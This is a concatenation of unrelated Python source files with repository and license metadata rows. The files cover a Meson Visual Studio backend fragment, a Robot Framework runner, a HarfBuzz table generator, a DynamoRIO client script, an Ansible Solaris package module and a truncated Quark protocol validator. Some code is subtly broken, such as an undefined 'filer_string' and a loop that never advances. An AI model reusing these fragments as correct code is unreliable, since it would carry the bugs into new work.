ET.SubElement(inc_hdrs, 'CLInclude', Include=relpath)
for h in gen_hdrs:
if path_normalize_add(h, previous_includes):
ET.SubElement(inc_hdrs, 'CLInclude', Include=h)
for h in target.extra_files:
relpath = os.path.join(down, h.rel_to_builddir(self.build_to_src))
if path_normalize_add(relpath, previous_includes):
ET.SubElement(inc_hdrs, 'CLInclude', Include=relpath)
for lang in pch_sources:
h = pch_sources[lang][0]
path = os.path.join(proj_to_src_dir, h)
if path_normalize_add(path, previous_includes):
ET.SubElement(inc_hdrs, 'CLInclude', Include=path)
previous_sources = []
if len(sources) + len(gen_src) + len(pch_sources) > 0:
inc_src = ET.SubElement(root, 'ItemGroup')
for s in sources:
relpath = os.path.join(down, s.rel_to_builddir(self.build_to_src))
if path_normalize_add(relpath, previous_sources):
inc_cl = ET.SubElement(inc_src, 'CLCompile', Include=relpath)
lang = Vs2010Backend.lang_from_source_file(s)
self.add_pch(pch_sources, lang, inc_cl)
self.add_additional_options(lang, inc_cl, file_args)
self.add_preprocessor_defines(lang, inc_cl, file_defines)
self.add_include_dirs(lang, inc_cl, file_inc_dirs)
ET.SubElement(inc_cl, 'ObjectFileName').text = "$(IntDir)" + self.object_filename_from_source(target, s)
for s in gen_src:
if path_normalize_add(s, previous_sources):
inc_cl = ET.SubElement(inc_src, 'CLCompile', Include=s)
lang = Vs2010Backend.lang_from_source_file(s)
self.add_pch(pch_sources, lang, inc_cl)
self.add_additional_options(lang, inc_cl, file_args)
self.add_preprocessor_defines(lang, inc_cl, file_defines)
self.add_include_dirs(lang, inc_cl, file_inc_dirs)
for lang in pch_sources:
impl = pch_sources[lang][1]
if impl and path_normalize_add(impl, previous_sources):
inc_cl = ET.SubElement(inc_src, 'CLCompile', Include=impl)
self.create_pch(pch_sources, lang, inc_cl)
self.add_additional_options(lang, inc_cl, file_args)
self.add_preprocessor_defines(lang, inc_cl, file_defines)
pch_header_dir = pch_sources[lang][3]
if pch_header_dir:
inc_dirs = copy.deepcopy(file_inc_dirs)
inc_dirs[lang] = [pch_header_dir] + inc_dirs[lang]
else:
inc_dirs = file_inc_dirs
self.add_include_dirs(lang, inc_cl, inc_dirs)
previous_objects = []
if self.has_objects(objects, additional_objects, gen_objs):
inc_objs = ET.SubElement(root, 'ItemGroup')
for s in objects:
relpath = os.path.join(down, s.rel_to_builddir(self.build_to_src))
if path_normalize_add(relpath, previous_objects):
ET.SubElement(inc_objs, 'Object', Include=relpath)
for s in additional_objects:
if path_normalize_add(s, previous_objects):
ET.SubElement(inc_objs, 'Object', Include=s)
self.add_generated_objects(inc_objs, gen_objs)
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.targets')
self.add_regen_dependency(root)
self.add_target_deps(root, target)
self._prettyprint_vcxproj_xml(ET.ElementTree(root), ofname)
def gen_regenproj(self, project_name, ofname):
root = ET.Element('Project', {'DefaultTargets': 'Build',
'ToolsVersion': '4.0',
'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'})
confitems = ET.SubElement(root, 'ItemGroup', {'Label': 'ProjectConfigurations'})
prjconf = ET.SubElement(confitems, 'ProjectConfiguration',
{'Include': self.buildtype + '|' + self.platform})
p = ET.SubElement(prjconf, 'Configuration')
p.text = self.buildtype
pl = ET.SubElement(prjconf, 'Platform')
pl.text = self.platform
globalgroup = ET.SubElement(root, 'PropertyGroup', Label='Globals')
guidelem = ET.SubElement(globalgroup, 'ProjectGuid')
guidelem.text = '{%s}' % self.environment.coredata.regen_guid
kw = ET.SubElement(globalgroup, 'Keyword')
kw.text = self.platform + 'Proj'
p = ET.SubElement(globalgroup, 'Platform')
p.text = self.platform
pname = ET.SubElement(globalgroup, 'ProjectName')
pname.text = project_name
if self.windows_target_platform_version:
ET.SubElement(globalgroup, 'WindowsTargetPlatformVersion').text = self.windows_target_platform_version
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.Default.props')
type_config = ET.SubElement(root, 'PropertyGroup', Label='Configuration')
ET.SubElement(type_config, 'ConfigurationType').text = "Utility"
ET.SubElement(type_config, 'CharacterSet').text = 'MultiByte'
ET.SubElement(type_config, 'UseOfMfc').text = 'false'
if self.platform_toolset:
ET.SubElement(type_config, 'PlatformToolset').text = self.platform_toolset
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.props')
direlem = ET.SubElement(root, 'PropertyGroup')
fver = ET.SubElement(direlem, '_ProjectFileVersion')
fver.text = self.project_file_version
outdir = ET.SubElement(direlem, 'OutDir')
outdir.text = '.\\'
intdir = ET.SubElement(direlem, 'IntDir')
intdir.text = 'regen-temp\\'
tname = ET.SubElement(direlem, 'TargetName')
tname.text = project_name
action = ET.SubElement(root, 'ItemDefinitionGroup')
midl = ET.SubElement(action, 'Midl')
ET.SubElement(midl, "AdditionalIncludeDirectories").text = '%(AdditionalIncludeDirectories)'
ET.SubElement(midl, "OutputDirectory").text = '$(IntDir)'
ET.SubElement(midl, 'HeaderFileName').text = '%(Filename).h'
ET.SubElement(midl, 'TypeLibraryName').text = '%(Filename).tlb'
ET.SubElement(midl, 'InterfaceIdentifierFilename').text = '%(Filename)_i.c'
ET.SubElement(midl, 'ProxyFileName').text = '%(Filename)_p.c'
regen_command = self.environment.get_build_command() + ['--internal', 'regencheck']
cmd_templ = '''call %s > NUL
"%s" "%s"'''
regen_command = cmd_templ % \
(self.get_vcvars_command(), '" "'.join(regen_command), self.environment.get_scratch_dir())
self.add_custom_build(root, 'regen', regen_command, deps=self.get_regen_filelist(),
outputs=[Vs2010Backend.get_regen_stampfile(self.environment.get_build_dir())],
msg='Checking whether solution needs to be regenerated.')
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.targets')
ET.SubElement(root, 'ImportGroup', Label='ExtensionTargets')
self._prettyprint_vcxproj_xml(ET.ElementTree(root), ofname)
def gen_testproj(self, target_name, ofname):
project_name = target_name
root = ET.Element('Project', {'DefaultTargets': "Build",
'ToolsVersion': '4.0',
'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'})
confitems = ET.SubElement(root, 'ItemGroup', {'Label': 'ProjectConfigurations'})
prjconf = ET.SubElement(confitems, 'ProjectConfiguration',
{'Include': self.buildtype + '|' + self.platform})
p = ET.SubElement(prjconf, 'Configuration')
p.text = self.buildtype
pl = ET.SubElement(prjconf, 'Platform')
pl.text = self.platform
globalgroup = ET.SubElement(root, 'PropertyGroup', Label='Globals')
guidelem = ET.SubElement(globalgroup, 'ProjectGuid')
guidelem.text = '{%s}' % self.environment.coredata.test_guid
kw = ET.SubElement(globalgroup, 'Keyword')
kw.text = self.platform + 'Proj'
p = ET.SubElement(globalgroup, 'Platform')
p.text = self.platform
pname = ET.SubElement(globalgroup, 'ProjectName')
pname.text = project_name
if self.windows_target_platform_version:
ET.SubElement(globalgroup, 'WindowsTargetPlatformVersion').text = self.windows_target_platform_version
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.Default.props')
type_config = ET.SubElement(root, 'PropertyGroup', Label='Configuration')
ET.SubElement(type_config, 'ConfigurationType')
ET.SubElement(type_config, 'CharacterSet').text = 'MultiByte'
ET.SubElement(type_config, 'UseOfMfc').text = 'false'
if self.platform_toolset:
ET.SubElement(type_config, 'PlatformToolset').text = self.platform_toolset
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.props')
direlem = ET.SubElement(root, 'PropertyGroup')
fver = ET.SubElement(direlem, '_ProjectFileVersion')
fver.text = self.project_file_version
outdir = ET.SubElement(direlem, 'OutDir')
outdir.text = '.\\'
intdir = ET.SubElement(direlem, 'IntDir')
intdir.text = 'test-temp\\'
tname = ET.SubElement(direlem, 'TargetName')
tname.text = target_name
action = ET.SubElement(root, 'ItemDefinitionGroup')
midl = ET.SubElement(action, 'Midl')
ET.SubElement(midl, "AdditionalIncludeDirectories").text = '%(AdditionalIncludeDirectories)'
ET.SubElement(midl, "OutputDirectory").text = '$(IntDir)'
ET.SubElement(midl, 'HeaderFileName').text = '%(Filename).h'
ET.SubElement(midl, 'TypeLibraryName').text = '%(Filename).tlb'
ET.SubElement(midl, 'InterfaceIdentifierFilename').text = '%(Filename)_i.c'
ET.SubElement(midl, 'ProxyFileName').text = '%(Filename)_p.c'
# FIXME: No benchmarks?
test_command = self.environment.get_build_command() + ['test', '--no-rebuild']
if not self.environment.coredata.get_option(OptionKey('stdsplit')):
test_command += ['--no-stdsplit']
if self.environment.coredata.get_option(OptionKey('errorlogs')):
test_command += ['--print-errorlogs']
self.serialize_tests()
self.add_custom_build(root, 'run_tests', '"%s"' % ('" "'.join(test_command)))
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.targets')
self.add_regen_dependency(root)
self._prettyprint_vcxproj_xml(ET.ElementTree(root), ofname)
def gen_installproj(self, target_name, ofname):
self.create_install_data_files()
project_name = target_name
root = ET.Element('Project', {'DefaultTargets': "Build",
'ToolsVersion': '4.0',
'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'})
confitems = ET.SubElement(root, 'ItemGroup', {'Label': 'ProjectConfigurations'})
prjconf = ET.SubElement(confitems, 'ProjectConfiguration',
{'Include': self.buildtype + '|' + self.platform})
p = ET.SubElement(prjconf, 'Configuration')
p.text = self.buildtype
pl = ET.SubElement(prjconf, 'Platform')
pl.text = self.platform
globalgroup = ET.SubElement(root, 'PropertyGroup', Label='Globals')
guidelem = ET.SubElement(globalgroup, 'ProjectGuid')
guidelem.text = '{%s}' % self.environment.coredata.install_guid
kw = ET.SubElement(globalgroup, 'Keyword')
kw.text = self.platform + 'Proj'
p = ET.SubElement(globalgroup, 'Platform')
p.text = self.platform
pname = ET.SubElement(globalgroup, 'ProjectName')
pname.text = project_name
if self.windows_target_platform_version:
ET.SubElement(globalgroup, 'WindowsTargetPlatformVersion').text = self.windows_target_platform_version
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.Default.props')
type_config = ET.SubElement(root, 'PropertyGroup', Label='Configuration')
ET.SubElement(type_config, 'ConfigurationType')
ET.SubElement(type_config, 'CharacterSet').text = 'MultiByte'
ET.SubElement(type_config, 'UseOfMfc').text = 'false'
if self.platform_toolset:
ET.SubElement(type_config, 'PlatformToolset').text = self.platform_toolset
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.props')
direlem = ET.SubElement(root, 'PropertyGroup')
fver = ET.SubElement(direlem, '_ProjectFileVersion')
fver.text = self.project_file_version
outdir = ET.SubElement(direlem, 'OutDir')
outdir.text = '.\\'
intdir = ET.SubElement(direlem, 'IntDir')
intdir.text = 'install-temp\\'
tname = ET.SubElement(direlem, 'TargetName')
tname.text = target_name
action = ET.SubElement(root, 'ItemDefinitionGroup')
midl = ET.SubElement(action, 'Midl')
ET.SubElement(midl, "AdditionalIncludeDirectories").text = '%(AdditionalIncludeDirectories)'
ET.SubElement(midl, "OutputDirectory").text = '$(IntDir)'
ET.SubElement(midl, 'HeaderFileName').text = '%(Filename).h'
ET.SubElement(midl, 'TypeLibraryName').text = '%(Filename).tlb'
ET.SubElement(midl, 'InterfaceIdentifierFilename').text = '%(Filename)_i.c'
ET.SubElement(midl, 'ProxyFileName').text = '%(Filename)_p.c'
install_command = self.environment.get_build_command() + ['install', '--no-rebuild']
self.add_custom_build(root, 'run_install', '"%s"' % ('" "'.join(install_command)))
ET.SubElement(root, 'Import', Project=r'$(VCTargetsPath)\Microsoft.Cpp.targets')
self.add_regen_dependency(root)
self._prettyprint_vcxproj_xml(ET.ElementTree(root), ofname)
def add_custom_build(self, node, rulename, command, deps=None, outputs=None, msg=None, verify_files=True):
igroup = ET.SubElement(node, 'ItemGroup')
rulefile = os.path.join(self.environment.get_scratch_dir(), rulename + '.rule')
if not os.path.exists(rulefile):
with open(rulefile, 'w', encoding='utf-8') as f:
f.write("# Meson regen file.")
custombuild = ET.SubElement(igroup, 'CustomBuild', Include=rulefile)
if msg:
message = ET.SubElement(custombuild, 'Message')
message.text = msg
if not verify_files:
ET.SubElement(custombuild, 'VerifyInputsAndOutputsExist').text = 'false'
cmd_templ = '''setlocal
%s
if %%errorlevel%% neq 0 goto :cmEnd
:cmEnd
endlocal & call :cmErrorLevel %%errorlevel%% & goto :cmDone
:cmErrorLevel
exit /b %%1
:cmDone
if %%errorlevel%% neq 0 goto :VCEnd'''
ET.SubElement(custombuild, 'Command').text = cmd_templ % command
if not outputs:
# Use a nonexistent file to always consider the target out-of-date.
outputs = [self.nonexistent_file(os.path.join(self.environment.get_scratch_dir(),
'outofdate.file'))]
ET.SubElement(custombuild, 'Outputs').text = ';'.join(outputs)
if deps:
ET.SubElement(custombuild, 'AdditionalInputs').text = ';'.join(deps)
@staticmethod
def nonexistent_file(prefix):
i = 0
file = prefix
while os.path.exists(file):
file = '%s%d' % (prefix, i)
return file
def generate_debug_information(self, link):
# valid values for vs2015 is 'false', 'true', 'DebugFastLink'
ET.SubElement(link, 'GenerateDebugInformation').text = 'true'
def add_regen_dependency(self, root):
regen_vcxproj = os.path.join(self.environment.get_build_dir(), 'REGEN.vcxproj')
self.add_project_reference(root, regen_vcxproj, self.environment.coredata.regen_guid)
| apache-2.0 | 3,410,752,762,889,756,700 | 52.52776 | 137 | 0.584703 | false |
iamApalive/robocop | bin/execute.py | 1 | 1957 | import robot,os
from robot import libraries
#from robot import robot_imports
#from robot.api import ExecutionResult
#from robot.api import TestData
def main():
#Push required data in builtins
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-t", "--test", dest="testlist", help="Specify file path of TestList to be executed", metavar="path-to-file")
parser.add_option("-b", "--browser", action="store", dest="browser")
parser.add_option("-i", "--includetag", dest="testincludetags", default=False, help="Run tests of given tag only")
parser.add_option("-e", "--excludetag", dest="testexcludetags", default=False, help="Exclude tests of given tag")
parser.add_option("-r", "--rungiventests", dest="rungiventests", default=False, help="Execute only given test case from suite")
parser.add_option("-m", "--randomize",action="store_true", dest="runrandomize", default=False, help="Randomizes the test execution order")
parser.add_option("-f", "--exitonfailure",action="store_true", dest="exitonfailure", default=False, help="Exit suite if test failed")
parser.add_option("-s", "--runsuite", action="store", dest="runsuitesetup", help="Run suite setup")
parser.add_option("-g", "--debugfile", action="store_true", dest="debugfile", default=False, help="Create debug log file")
parser.add_option("-u", "--baseurl", action="store", dest="baseurl")
parser.add_option("-n", "--TestName", action="store", dest="test_name")
parser.add_option("-M", "--MetaData", action="store", dest="metadata")
# parser.add_option("-a", "--abortonfailure", action="store_true", dest="abortonfailure", default=False, help="Abort suite on first test failure ")
s,remainder = parser.parse_args()
global tr
tr = os.getcwd()
from robot import pythonpathsetter
pythonpathsetter.add_path(tr)
robot.run(s.testlist)
if __name__ == "__main__":
main()
| apache-2.0 | -5,823,500,524,515,763,000 | 53.361111 | 151 | 0.681145 | false |
Crystalnix/house-of-life-chromium | third_party/harfbuzz/contrib/tables/category-parse.py | 55 | 2223 | import sys
from unicode_parse_common import *
# http://www.unicode.org/Public/5.1.0/ucd/extracted/DerivedGeneralCategory.txt
category_to_harfbuzz = {
'Mn': 'HB_Mark_NonSpacing',
'Mc': 'HB_Mark_SpacingCombining',
'Me': 'HB_Mark_Enclosing',
'Nd': 'HB_Number_DecimalDigit',
'Nl': 'HB_Number_Letter',
'No': 'HB_Number_Other',
'Zs': 'HB_Separator_Space',
'Zl': 'HB_Separator_Line',
'Zp': 'HB_Separator_Paragraph',
'Cc': 'HB_Other_Control',
'Cf': 'HB_Other_Format',
'Cs': 'HB_Other_Surrogate',
'Co': 'HB_Other_PrivateUse',
'Cn': 'HB_Other_NotAssigned',
'Lu': 'HB_Letter_Uppercase',
'Ll': 'HB_Letter_Lowercase',
'Lt': 'HB_Letter_Titlecase',
'Lm': 'HB_Letter_Modifier',
'Lo': 'HB_Letter_Other',
'Pc': 'HB_Punctuation_Connector',
'Pd': 'HB_Punctuation_Dash',
'Ps': 'HB_Punctuation_Open',
'Pe': 'HB_Punctuation_Close',
'Pi': 'HB_Punctuation_InitialQuote',
'Pf': 'HB_Punctuation_FinalQuote',
'Po': 'HB_Punctuation_Other',
'Sm': 'HB_Symbol_Math',
'Sc': 'HB_Symbol_Currency',
'Sk': 'HB_Symbol_Modifier',
'So': 'HB_Symbol_Other',
}
def main(infile, outfile):
ranges = unicode_file_parse(infile, category_to_harfbuzz)
ranges = sort_and_merge(ranges)
print >>outfile, '// Generated from Unicode script tables\n'
print >>outfile, '#ifndef CATEGORY_PROPERTIES_H_'
print >>outfile, '#define CATEGORY_PROPERTIES_H_\n'
print >>outfile, '#include <stdint.h>'
print >>outfile, '#include "harfbuzz-external.h"\n'
print >>outfile, 'struct category_property {'
print >>outfile, ' uint32_t range_start;'
print >>outfile, ' uint32_t range_end;'
print >>outfile, ' HB_CharCategory category;'
print >>outfile, '};\n'
print >>outfile, 'static const struct category_property category_properties[] = {'
for (start, end, value) in ranges:
print >>outfile, ' {0x%x, 0x%x, %s},' % (start, end, value)
print >>outfile, '};\n'
print >>outfile, 'static const unsigned category_properties_count = %d;\n' % len(ranges)
print >>outfile, '#endif // CATEGORY_PROPERTIES_H_'
if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <input .txt> <output .h>' % sys.argv[0]
else:
main(file(sys.argv[1], 'r'), file(sys.argv[2], 'w+'))
| bsd-3-clause | -8,029,093,537,978,823,000 | 30.757143 | 90 | 0.637877 | false |
CharithYMendis/Helium | utility/drclient.py | 1 | 3592 | import os
import subprocess
import common
def get_drclient_command(client_args,exec_args):
dr32 = os.environ.get('DYNAMORIO_32_RELEASE_HOME')
dr_path = dr32 + '/bin32/drrun.exe'
command = dr_path + ' -root ' + dr32 + ' -syntax_intel -c exalgo.dll ' + client_args + ' -- ' + exec_args
return command
def get_filter_mode(filter_string):
filter_list = ['bb','module','range','func','neg_module','none','app_pc','nudge']
return str(filter_list.index(filter_string) + 1)
def get_instrace_mode(instrace_string):
if instrace_string == '':
return ''
else:
instrace_list = ['opndtrace','opcodetrace','disasmtrace','instrace','ins_distrace']
return str(instrace_list.index(instrace_string) + 1)
def create_client_args(clients,executable,
filter_file,filter_mode,
instrace_mode,in_image,
debug):
filter_mode_num = get_filter_mode(filter_mode)
filter_string = filter_file + ' ' + filter_mode_num
instrace_mode_num = get_instrace_mode(instrace_mode)
output_folder = os.environ.get('EXALGO_OUTPUT_FOLDER')
log_folder = os.environ.get('EXALGO_LOG_FOLDER')
filter_folder = os.environ.get('EXALGO_FILTER_FOLDER')
md_app_pc_file = filter_folder + '\\filter_' + executable + '_app_pc.log'
debug_value = common.boolstr(debug)
client_args = '-logdir ' + log_folder + ' -debug ' + debug_value + ' -log 1 -exec ' + executable
split = clients.split(',')
for client in split:
if client == 'functrace':
client_args += ' -functrace ' + filter_string
if client == 'profile':
client_args += ' -profile ' + filter_string + ' ' + output_folder + ' ' + in_image
if client == 'memtrace':
client_args += ' -memtrace ' + filter_string + ' ' + output_folder + ' ' + in_image
if client == 'funcwrap':
client_args += ' -funcwrap ' + filter_file
if client == 'cpuid':
client_args += ' -cpuid'
if client == 'inscount':
client_args += ' -inscount ' + filer_string
if client == 'instrace':
client_args += ' -instrace ' + filter_string + ' ' + output_folder + ' 600000 ' + instrace_mode_num + ' ' + in_image
if client == 'memdump':
client_args += ' -memdump ' + filter_string + ' ' + md_app_pc_file + ' ' + output_folder
if client == 'funcreplace':
client_args += ' -funcreplace ' + filter_string
if client == 'misc':
client_args += ' -misc ' + filter_string
return client_args
def run_drclients(path,executable,args,
debug,clients,
filter_mode,filter_file,
input_image,instrace_mode):
client_args = create_client_args(clients,executable,filter_file,filter_mode,instrace_mode,input_image,debug)
dr_client_command = get_drclient_command(client_args,path + ' ' + common.xstr(args))
parent_folder = os.environ.get('EXALGO_PARENT_FOLDER')
os.chdir(parent_folder + '/dr_clients/build32/bin')
p = subprocess.Popen(dr_client_command)
p.communicate()
| mit | 4,375,205,477,405,711,400 | 40.767442 | 140 | 0.52255 | false |
hslee16/ansible-modules-extras | packaging/os/svr4pkg.py | 126 | 7874 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Boyd Adamson <boyd () boydadamson.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
DOCUMENTATION = '''
---
module: svr4pkg
short_description: Manage Solaris SVR4 packages
description:
- Manages SVR4 packages on Solaris 10 and 11.
- These were the native packages on Solaris <= 10 and are available
as a legacy feature in Solaris 11.
- Note that this is a very basic packaging system. It will not enforce
dependencies on install or remove.
version_added: "0.9"
author: "Boyd Adamson (@brontitall)"
options:
name:
description:
- Package name, e.g. C(SUNWcsr)
required: true
state:
description:
- Whether to install (C(present)), or remove (C(absent)) a package.
- If the package is to be installed, then I(src) is required.
- The SVR4 package system doesn't provide an upgrade operation. You need to uninstall the old, then install the new package.
required: true
choices: ["present", "absent"]
src:
description:
- Specifies the location to install the package from. Required when C(state=present).
- "Can be any path acceptable to the C(pkgadd) command's C(-d) option. e.g.: C(somefile.pkg), C(/dir/with/pkgs), C(http:/server/mypkgs.pkg)."
- If using a file or directory, they must already be accessible by the host. See the M(copy) module for a way to get them there.
proxy:
description:
- HTTP[s] proxy to be used if C(src) is a URL.
response_file:
description:
- Specifies the location of a response file to be used if package expects input on install. (added in Ansible 1.4)
required: false
zone:
description:
- Whether to install the package only in the current zone, or install it into all zones.
- The installation into all zones works only if you are working with the global zone.
required: false
default: "all"
choices: ["current", "all"]
version_added: "1.6"
category:
description:
- Install/Remove category instead of a single package.
required: false
choices: ["true", "false"]
version_added: "1.6"
'''
EXAMPLES = '''
# Install a package from an already copied file
- svr4pkg: name=CSWcommon src=/tmp/cswpkgs.pkg state=present
# Install a package directly from an http site
- svr4pkg: name=CSWpkgutil src=http://get.opencsw.org/now state=present zone=current
# Install a package with a response file
- svr4pkg: name=CSWggrep src=/tmp/third-party.pkg response_file=/tmp/ggrep.response state=present
# Ensure that a package is not installed.
- svr4pkg: name=SUNWgnome-sound-recorder state=absent
# Ensure that a category is not installed.
- svr4pkg: name=FIREFOX state=absent category=true
'''
import os
import tempfile
def package_installed(module, name, category):
cmd = [module.get_bin_path('pkginfo', True)]
cmd.append('-q')
if category:
cmd.append('-c')
cmd.append(name)
rc, out, err = module.run_command(' '.join(cmd))
if rc == 0:
return True
else:
return False
def create_admin_file():
(desc, filename) = tempfile.mkstemp(prefix='ansible_svr4pkg', text=True)
fullauto = '''
mail=
instance=unique
partial=nocheck
runlevel=quit
idepend=nocheck
rdepend=nocheck
space=quit
setuid=nocheck
conflict=nocheck
action=nocheck
networktimeout=60
networkretries=3
authentication=quit
keystore=/var/sadm/security
proxy=
basedir=default
'''
os.write(desc, fullauto)
os.close(desc)
return filename
def run_command(module, cmd):
progname = cmd[0]
cmd[0] = module.get_bin_path(progname, True)
return module.run_command(cmd)
def package_install(module, name, src, proxy, response_file, zone, category):
adminfile = create_admin_file()
cmd = [ 'pkgadd', '-n']
if zone == 'current':
cmd += [ '-G' ]
cmd += [ '-a', adminfile, '-d', src ]
if proxy is not None:
cmd += [ '-x', proxy ]
if response_file is not None:
cmd += [ '-r', response_file ]
if category:
cmd += [ '-Y' ]
cmd.append(name)
(rc, out, err) = run_command(module, cmd)
os.unlink(adminfile)
return (rc, out, err)
def package_uninstall(module, name, src, category):
adminfile = create_admin_file()
if category:
cmd = [ 'pkgrm', '-na', adminfile, '-Y', name ]
else:
cmd = [ 'pkgrm', '-na', adminfile, name]
(rc, out, err) = run_command(module, cmd)
os.unlink(adminfile)
return (rc, out, err)
def main():
module = AnsibleModule(
argument_spec = dict(
name = dict(required = True),
state = dict(required = True, choices=['present', 'absent']),
src = dict(default = None),
proxy = dict(default = None),
response_file = dict(default = None),
zone = dict(required=False, default = 'all', choices=['current','all']),
category = dict(default=False, type='bool')
),
supports_check_mode=True
)
state = module.params['state']
name = module.params['name']
src = module.params['src']
proxy = module.params['proxy']
response_file = module.params['response_file']
zone = module.params['zone']
category = module.params['category']
rc = None
out = ''
err = ''
result = {}
result['name'] = name
result['state'] = state
if state == 'present':
if src is None:
module.fail_json(name=name,
msg="src is required when state=present")
if not package_installed(module, name, category):
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = package_install(module, name, src, proxy, response_file, zone, category)
# Stdout is normally empty but for some packages can be
# very long and is not often useful
if len(out) > 75:
out = out[:75] + '...'
elif state == 'absent':
if package_installed(module, name, category):
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err) = package_uninstall(module, name, src, category)
out = out[:75]
# Returncodes as per pkgadd(1m)
# 0 Successful completion
# 1 Fatal error.
# 2 Warning.
# 3 Interruption.
# 4 Administration.
# 5 Administration. Interaction is required. Do not use pkgadd -n.
# 10 Reboot after installation of all packages.
# 20 Reboot after installation of this package.
# 99 (observed) pkgadd: ERROR: could not process datastream from </tmp/pkgutil.pkg>
if rc in (0, 2, 3, 10, 20):
result['changed'] = True
# no install nor uninstall, or failed
else:
result['changed'] = False
# Only return failed=False when the returncode is known to be good as there may be more
# undocumented failure return codes
if rc not in (0, 2, 10, 20):
result['failed'] = True
else:
result['failed'] = False
if out:
result['stdout'] = out
if err:
result['stderr'] = err
module.exit_json(**result)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 | -7,796,063,220,856,292,000 | 31.270492 | 147 | 0.639319 | false |
alanquillin/quark | quark/protocols.py | 3 | 5847 | # Copyright 2014 Openstack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
from neutron.common import exceptions
from neutron.extensions import securitygroup as sg_ext
from oslo_config import cfg
from oslo_log import log as logging
from quark import exceptions as q_exc
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
# Neutron doesn't officially support any other ethertype
ETHERTYPES = {
"IPv4": 0x0800,
"IPv6": 0x86DD
}
PROTOCOLS_V4 = {"icmp": 1, "tcp": 6, "udp": 17}
PROTOCOLS_V6 = {"tcp": 6, "udp": 17, "icmp": 58}
# Neutron only officially supports TCP, ICMP and UDP,
# with ethertypes IPv4 and IPv6
PROTOCOL_MAP = {
ETHERTYPES["IPv4"]: PROTOCOLS_V4,
ETHERTYPES["IPv6"]: PROTOCOLS_V6
}
ALLOWED_PROTOCOLS = None
ALLOWED_WITH_RANGE = [1, 6, 17, 58]
MIN_PROTOCOL = 0
MAX_PROTOCOL = 255
REVERSE_PROTOCOL_MAP = {}
REVERSE_ETHERTYPES = {}
MIN_PORT = 0
MAX_PORT = 65535
def _is_allowed(protocol, ethertype):
# Please see http://en.wikipedia.org/wiki/List_of_IP_protocol_numbers
# The field is always 8 bits wide.
if not (MIN_PROTOCOL <= protocol <= MAX_PROTOCOL):
return False
return (protocol in PROTOCOL_MAP[ethertype] or
protocol in REVERSE_PROTOCOL_MAP)
def translate_ethertype(ethertype):
if ethertype not in ETHERTYPES:
raise q_exc.InvalidEthertype(ethertype=ethertype)
return ETHERTYPES[ethertype]
def translate_protocol(protocol, ethertype):
ether = translate_ethertype(ethertype)
try:
proto = int(protocol)
except ValueError:
proto = str(protocol).lower()
proto = PROTOCOL_MAP[ether].get(proto, -1)
if not _is_allowed(proto, ether):
# TODO(mdietz) This will change as neutron supports new protocols
value_list = PROTOCOL_MAP[ETHERTYPES["IPv4"]].keys()
raise sg_ext.SecurityGroupRuleInvalidProtocol(
protocol=protocol, values=value_list)
return proto
def human_readable_ethertype(ethertype):
return REVERSE_ETHERTYPES[ethertype]
def human_readable_protocol(protocol, ethertype):
if protocol is None:
return
proto = translate_protocol(protocol, ethertype)
return REVERSE_PROTOCOL_MAP[proto]
def validate_remote_ip_prefix(ethertype, prefix):
if prefix:
net = netaddr.IPNetwork(prefix)
if ((ethertype == ETHERTYPES["IPv4"] and net.version == 6) or
(ethertype == ETHERTYPES["IPv6"] and net.version == 4)):
human_ether = human_readable_ethertype(ethertype)
raise exceptions.InvalidInput(
error_message="Etherytype %s does not match "
"remote_ip_prefix, which is IP version %s" %
(human_ether, net.version))
def validate_protocol_with_port_ranges(ethertype, protocol, port_range_min,
port_range_max):
if protocol in ALLOWED_WITH_RANGE:
if protocol == PROTOCOL_MAP[ethertype]["icmp"]:
if port_range_min is None and port_range_max is not None:
raise sg_ext.SecurityGroupMissingIcmpType(value=port_range_max)
elif port_range_min is not None:
attr = None
field = None
value = None
if port_range_min < 0 or port_range_min > 255:
field = "port_range_min"
attr = "type"
value = port_range_min
elif (port_range_max is not None and
port_range_max < 0 or port_range_max > 255):
field = "port_range_max"
attr = "code"
value = port_range_max
if attr and field and value:
raise sg_ext.SecurityGroupInvalidIcmpValue(
field=field, attr=attr, value=value)
else:
if (port_range_min is None) != (port_range_max is None):
# TODO(anyone): what exactly is a TCP or UDP rule withouts
# ports?
raise exceptions.InvalidInput(
error_message="For TCP/UDP rules, port_range_min and"
"port_range_max must either both be supplied"
", or neither of them")
if port_range_min is not None and port_range_max is not None:
if port_range_min > port_range_max:
